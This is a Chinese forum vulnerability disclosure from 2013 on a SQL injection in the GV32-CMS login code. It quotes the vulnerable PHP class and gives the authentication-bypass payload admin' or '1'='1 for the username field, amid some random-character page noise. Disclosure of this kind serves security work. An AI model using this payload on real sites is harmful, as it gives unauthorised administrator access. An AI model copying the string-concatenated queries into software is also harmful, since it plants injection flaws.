找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3387|回复: 0
打印 上一主题 下一主题

GV32CMS最新漏洞(暗月渗透测试团队原创)

[复制链接]
跳转到指定楼层
楼主
发表于 2013-10-27 16:23:02 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
0x01 简要描述:4 |2 L' ^/ I6 n' A9 {4 Y
GV32-CMS免费开源企业建站系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业企业建站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为GV32.COM原创,有着完全的知识产权。凭借 GV32.COM的不断创新精神和认真的工作态度,GV32-CMS企业建站系统已成国内外同类软件中的最好用的企业建站系统。2 s: b) R6 h' y) p8 w( Z& |
0x02 详细说明:
  • <?php
  • if (!defined('GV32_COM')) exit('GV32.COM No direct script access allowed');
  • class Login
  • {
  • function Login()
  • {
  • //echo 'Login';
  • }
  • function act( )
  • {
  • //缓存一天 //60 * 60 * 24 缓存时间 一天
  • $GLOBALS['Templ'] -> caching = true;
  • $GLOBALS['Templ'] -> cache_lifetime = 86400 ;
  • $GLOBALS['Templ'] -> assign('copyright',COPYRIGHT); //版权
  • $GLOBALS['Templ'] -> assign('actUrl',EMPLOYEE_WEBURL."/login.php?load=login&act=actlogin");
  • $GLOBALS['Templ'] -> display('login_tpl.html');
  • }
  • function actlogin( )
  • {
  • echo $use_nameval = $GLOBALS['Reque'] -> funpost("use_name");
  • $use_pwdval = $GLOBALS['Reque'] -> funpost("use_pwd");
  • $use_captchaval = $GLOBALS['Reque'] -> funpost("use_captcha");
  • $this -> logincount();
  • if($use_captchaval!=$_SESSION["Img"])
  • {
  • $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_captchaerror']);
  • $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
  • $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
  • $GLOBALS['Templ'] -> display('suggestion_tpl.html');
  • }else{
  • $sqlQuery = " SELECT use_id,use_name,use_email FROM ".SQL_PREFIX."user WHERE use_name= '".$use_nameval."' AND use_pwd = '".md5($use_pwdval)."' and use_enabled = 1 LIMIT 1 ";
  • //exit();
  • $adminInfo["emplyeeUser"] = $GLOBALS['MySql'] -> selectOne($sqlQuery);
  • if($adminInfo["emplyeeUser"]["use_id"])
  • {
  • $GLOBALS['WebSe'] -> SetSession( $adminInfo );
  • $nowtime = time();
  • $adminip = $GLOBALS['Helpe'] -> getip();
  • //登录成功更新用户信息
  • $sqlup = " UPDATE ".SQL_PREFIX."user set use_logcount = use_logcount +1 , use_loginip = '".$adminip."', use_logintime = ".$nowtime." WHERE use_name= '".$use_nameval."' and use_id = ".$adminInfo["emplyeeUser"]["use_id"]." LIMIT 1 " ;
  • $GLOBALS['MySql'] -> querySql($sqlup);
  • //登录成功!重置IP错误信息清0!
  • $updateip = "UPDATE `".SQL_PREFIX."loginerror` SET errorcount = 0 WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
  • $GLOBALS['MySql'] -> querySql( $updateip );
  • $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_loginsusse']);
  • $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
  • $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL);
  • $GLOBALS['Templ'] -> display('suggestion_tpl.html');
  • //var_dump($_SESSION);
  • }else{
  • $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_usererror']);
  • $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
  • $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
  • $GLOBALS['Templ'] -> display('suggestion_tpl.html');
  • /*
  • header("location:".EMPLOYEE_WEBURL."/login.php?load=login&act=act");
  • exit();
  • */
  • }
  • }
  • }
  • function logincount()
  • {
  • $adminip = $GLOBALS['Helpe'] -> getip();
  • $now = time();
  • if( $adminip!='Unknown' and $adminip!='' )
  • {
  • //查询记录是否存在
  • $sqlip = " SELECT error_id , session_id , errorcount , start_time FROM ".SQL_PREFIX."loginerror WHERE ip_address = '".$adminip."' AND logtype = 'login' LIMIT 1 ";
  • $useripInfo = $GLOBALS['MySql'] -> selectOne($sqlip);
  • if($useripInfo["error_id"])
  • {
  • //超过一天。重置时间及数量
  • if( $useripInfo["start_time"] > ( $now + 86400 ) )
  • {
  • $updateip = "UPDATE `".SQL_PREFIX."loginerror` SET `session_id` = '".$_SESSION["session_id"]."' , start_time ='".$now."' ,errorcount = '1' WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
  • $GLOBALS['MySql'] -> querySql($updateip);
  • }elseif( $useripInfo["errorcount"] >= 20 )
  • {
  • $updateip = "UPDATE `loginerror` SET errorcount = errorcount + 1 WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
  • $GLOBALS['MySql'] -> querySql( $updateip );
  • $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_tomorrowerror']);
  • $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
  • $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
  • $GLOBALS['Templ'] -> display('suggestion_tpl.html');
  • exit();
  • }else{
  • if( $useripInfo["errorcount"] < 5 )
  • {
  • $updateip = "UPDATE `".SQL_PREFIX."loginerror` SET errorcount = errorcount + 1 WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
  • $GLOBALS['MySql'] -> querySql($updateip);
  • }elseif( $useripInfo["start_time"] > ( $now - 3600) )
  • {
  • $updateip = "UPDATE `".SQL_PREFIX."loginerror` SET errorcount = errorcount + 1 WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
  • $GLOBALS['MySql'] -> querySql($updateip);
  • $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_counterror']);
  • $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
  • $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
  • $GLOBALS['Templ'] -> display('suggestion_tpl.html');
  • exit();
  • }else{
  • $updateip = "UPDATE `".SQL_PREFIX."loginerror` SET errorcount = errorcount + 1 ,session_id = '".$_SESSION["session_id"]."' WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
  • $GLOBALS['MySql'] -> querySql($updateip);
  • }
  • }
  • //时间未超过1小时,状态有效,数量是否超过5次
  • //未超过5次更新+1
  • }else{
  • $insertip ="INSERT INTO `".SQL_PREFIX."loginerror` (`session_id` , `errorcount` , `ip_address` , `start_time` , `logtype` ) VALUES ( '".$_SESSION["session_id"]."', '1', '$adminip', '$now', 'login')";
  • $GLOBALS['MySql'] -> querySql($insertip);
  • }
  • }else{
  • $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_syserror']);
  • $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
  • $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
  • $GLOBALS['Templ'] -> display('suggestion_tpl.html');
  • exit();
  • }
  • }
  • }
  • $Login = new Login();
  • ?>
    6 s, ^( S" z+ a  [0 K' \
* s& O' j  w2 H' j& z4 ^+ \1 n- s& |
复制代码
/ C) A/ g% b0 H经典语句重现
  • $sqlQuery = " SELECT use_id,use_name,use_email FROM ".SQL_PREFIX."user WHERE use_name= '".$use_nameval."' AND use_pwd = '".md5($use_pwdval)."' and use_enabled = 1 LIMIT 1 ";( Q6 T3 `; X8 \
) U+ |, k4 O5 x# X
复制代码8 I3 ]7 m5 I1 w: x4 ^! ^
原本以为注释就完事了 后来发现被过滤l 再看funpost函数 + S" @3 \  p% S
+ v# [1 m+ {. Y# r, E
8 h. V, _& ~7 R: I$ V

7 n8 c; g- A( j7 \0x03 漏洞证明:
0 X& l% \1 y! D! @: j$ z5 g1 @登录用户处填写 admin' or '1'='1
/ r' W* U& q, y" k( }: C, m/ u$ B, J9 E
, a! a' i" V2 s& W( N" Z3 G& e

/ j9 i8 z$ @- Z9 w' K+ L) r
7 h7 s$ R" q+ A9 r8 \2 @" Z/ L5 p

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表